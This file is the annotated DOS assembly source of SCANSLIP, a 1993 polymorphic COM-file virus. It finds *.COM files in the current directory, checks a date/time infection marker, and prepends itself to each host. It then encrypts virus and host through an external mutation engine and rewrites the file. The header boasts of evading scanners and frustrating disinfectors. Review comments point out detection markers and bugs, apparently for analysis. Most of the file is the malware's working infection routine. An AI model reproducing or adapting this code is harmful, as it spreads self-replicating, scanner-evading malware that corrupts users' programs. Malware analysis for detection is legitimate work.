;SCANSLIP (C) 1993 American Eagle Publications, Inc., All Rights Reserved!
;A small mutation-engine based COM infector which encrypts both the
;virus and the COM file. A real bear for disinfectors.
;This virus uses a modified Trident Polymorphic Engine in combination with the
;Darwinian Genetic Mutation Engine. It will sneak around scanners!
;This Virus for research purposes only. Please do not release!
;Please execute it only on a carefully controlled system, and only
;if you know what you're doing!
;
;NOTE(review): historical DOS (16-bit real mode, MASM syntax) malware source,
;kept here for analysis only. This file is NOT self-contained: the polymorphic
;encryptor CRYPT, the DGME routines DEFINE_RANDOM_DNA/MUTATE_DNA/GENE_GET and
;the HOST label are EXTRN, so the emitted decryptor and the exact on-disk
;layout cannot be derived from this listing alone.
;What a detector/disinfector can rely on from the visible code:
;  - only files matching the pattern '*.COM' (no path, i.e. the current
;    directory) are candidates;
;  - "already infected" marker: (file time XOR file date) mod 10 == 3,
;    tested via INT 21h/5700h before infecting and forced via 5701h after;
;  - the target is rewritten from offset 0 as CRYPT's output over the
;    in-memory image [virus][host]; the plain host bytes are not kept.
.model tiny ;Tiny model to create a COM file
.code
extrn crypt:near ;mutation engine function (external; register contract assumed from the call site below)
extrn host:near ;host program; OFFSET HOST marks the end of the virus image
extrn DEFINE_RANDOM_DNA:NEAR,MUTATE_DNA:NEAR ;DGME: first-generation init / per-generation mutation
extrn DNALOC:DWORD,DNALEN:WORD ;DGME inputs: far pointer to the DNA buffer and its length
extrn GENE_GET:NEAR,GENE_PTR:DWORD ;DGME gene accessor and its far pointer (GENE_GET is never called in this file)
;DTA definitions. The virus moves the DTA to offset 0 of its own (high) segment
;in FIND_FILE, so these are absolute offsets within that segment.
DTA EQU 0000H ;Disk transfer area
FSIZE EQU DTA+1AH ;file size location in file search (only the low word is used below)
FNAME EQU DTA+1EH ;file name location in file search (ASCIIZ)
ORG 100H
;******************************************************************************
;The virus starts here.
;Entry state is not established by this listing; the code assumes DS is the
;segment it was loaded in and that SS is that same "low" segment (ALLDONE
;reloads DS/ES from SS). The body may sit at any offset in that segment,
;so its real location is recovered with the CALL/POP trick below.
VIRSTART:
call GETLOC
GETLOC: pop si ;si = runtime offset of GETLOC
sub si,3 ;heres where virus starts (3 = size of the near CALL above)
push si ;saved for FIND_FILE, which pops it after the RETF
mov ax,ds
add ax,1000H
mov es,ax ;upper segment is this one + 1000H (no memory-allocation call precedes this)
mov di,100H ;move virus there at offset 100H
mov cx,OFFSET HOST - 100H ;size of the virus image = everything below HOST
rep movsb ;this will louse the infection up if run under debug!
mov ds,ax ;set ds to high segment
push ds
mov ax,OFFSET FIND_FILE
push ax
retf ;jump to high memory segment (far "return" to high:FIND_FILE)
;Now it's time to find a viable file to infect. We will look for any COM file
;and see if the virus is there already.
;Runs with CS=DS = high segment. From NXT1 on, BX holds the open file handle.
FIND_FILE:
pop si ;the low-segment offset of the virus pushed at VIRSTART
mov [HOSTOFS],si ;need this in high memory (ALLDONE uses it to locate the host)
xor dx,dx ;move dta to high segment
mov ah,1AH ;so we don't trash the command line
int 21H ;which the host is expecting
mov dx,OFFSET COMFILE
mov ch,3FH ;search for any file, no matter what attribute (note: cx=0 before this instr)
;NOTE(review): INT 21h/4Eh takes the attribute mask in CL; here CH is loaded and
;CL stays 0, so the effective mask may not be "any attribute" as the comment
;claims - confirm against the DOS reference before relying on which files match.
mov ah,4EH ;DOS search first function
int 21H
CHECK_FILE: jnc NXT1 ;CF clear: a match is in the DTA
jmp ALLDONE ;no COM files to infect
NXT1: mov dx,FNAME ;first open the file
mov ax,3D02H ;r/w access open file, since we'll want to write to it
int 21H
jc NEXT_FILE ;open failed: skip to the next match
mov bx,ax ;put file handle in bx, and leave it there for the duration
mov ax,5700H ;get file date (dx) and time (cx)
int 21H
mov ax,cx
xor ax,dx ;date xor time mod 10 = 3 for infected file
xor dx,dx
mov cx,10
div cx ;dx = (time XOR date) mod 10
cmp dx,3
jnz INFECT_FILE ;not 3, go infect
;NOTE(review): when the marker matches, execution falls through to NEXT_FILE
;without closing the handle in BX (no INT 21h/3Eh on this path), so every
;already-infected match leaks one file handle.
NEXT_FILE: mov ah,4FH ;look for another file
int 21H
jmp SHORT CHECK_FILE ;and go check it out
COMFILE DB '*.COM',0 ;search pattern (ASCIIZ)
HOSTOFS DW 0 ;low-segment offset at which the virus (and the host after it) was found
;When we get here the file is open (handle in BX) but not yet read. It is read
;in below, directly after the virus image at OFFSET HOST, so the high segment
;then holds [virus][host] laid out exactly as the infected file will look.
;CRYPT encrypts that image and the file is rewritten from offset 0 with it.
INFECT_FILE:
push bx ;save file handle (the DGME/CRYPT register usage is not visible here, so BX is parked on the stack)
mov ax,OFFSET DNA ;set up address of DNA
mov WORD PTR [DNALOC],ax ;for DGME
mov WORD PTR [GENE_PTR],ax
mov ax,cs
mov WORD PTR [DNALOC+2],ax ;both far pointers = CS:DNA
mov WORD PTR [GENE_PTR+2],ax
mov ax,DNA_LENGTH
mov [DNALEN],ax
mov al,[FIRST] ;is this the first infection?
or al,al
jz MUTATE ;no, mutate the gene
call DEFINE_RANDOM_DNA ;yes, define the DNA sequence to start
jmp SHORT DNA_MODIFIED
MUTATE: call MUTATE_DNA
DNA_MODIFIED: xor al,al
mov [FIRST],al ;clear the first-generation flag in the image about to be written
pop bx
push bx ;bx = handle again; a copy stays on the stack for after CRYPT
mov dx,OFFSET HOST ;end of virus = where the host is read to
mov di,FSIZE ;if read in first, this gets trashed by the engine
mov cx,cs:[di] ;get file size for reading into buffer (low word only; the DTA sits at CS:0)
push cx
mov ah,3FH ;DOS read function
int 21H ;read host in (return status / short read is not checked)
pop cx
add cx,OFFSET HOST - 100H ;size of code to encrypt = virus image + host
mov dx,100H ;ds:dx --> code to encrypt
mov bp,dx ;offset where execution begins
mov di,0
mov si,0
mov ax,ds ;set up work seg for tpe
add ax,1000H
mov es,ax ;es = work segment, another 64K above the virus segment (again not allocated)
mov bl,1 ;small model
mov ax,80H
call crypt ;external TPE; presumably returns DS:DX -> encrypted image and CX = its length, since those are what is written below - confirm in CRYPT
pop bx ;file handle
push dx
push cx
xor cx,cx
mov dx,cx ;reset file pointer to start of file
mov ax,4200H
int 21H
pop cx
pop dx
; mov di,FSIZE
; add cx,cs:[di] ;add host size to size to write
mov ah,40H
int 21H ;write virus+host to file (host size was already folded into cx above; result not checked)
push cs
pop ds ;ds=cs again after CRYPT
mov ax,5700H ;get date & time on file
int 21H
push dx ;keep the date
mov ax,cx ;fix it: force (time XOR date) mod 10 == 3, the marker tested at NXT1
xor ax,dx
mov cx,10
xor dx,dx
div cx ;ax = (time XOR date) / 10
mul cx ;ax = that * 10 (clobbers dx; the date is restored by the pop below)
add ax,3 ;-> a value congruent to 3 mod 10
pop dx ;date back in dx
xor ax,dx ;new time = marked value XOR date
mov cx,ax
mov ax,5701H ;and save it
int 21H
EXIT_ERR: ;no visible jump targets this label; it is only reached by fall-through
mov ah,3EH ;close the file
int 21H
;The infection process is now complete. This routine moves the host program
;down so that its code starts at offset 100H, and then transfers control to it.
;Also reached directly from CHECK_FILE when no candidate file was found.
ALLDONE:
mov bx,[HOSTOFS] ;relative offset of program
sub bx,100H ;bx=size of decrypt routine (how far the virus sat above 100H in the low segment)
mov ax,ss ;set ds, es to low segment again (no SS load occurs anywhere in this file)
mov ds,ax
mov es,ax
push ax ;prep for retf to host
mov dx,80H ;restore dta to original value
mov ah,1AH ;for compatibility
int 21H
mov di,100H ;prep to move host back to original location
mov si,OFFSET HOST
add si,bx ;si = low-segment offset of the host = HOSTOFS + (OFFSET HOST - 100H)
push di
mov cx,sp ;move code, but don't trash the stack (copies everything from the host up to SP)
sub cx,si
rep movsb ;move code
retf ;and return to host (far jump to low:100H)
FIRST DB 1 ; = 1 if this is the 1st generation
DNA_LENGTH EQU 100H ;length of DNA for this virus
DNA DB DNA_LENGTH dup (0) ;DNA for this virus
END VIRSTART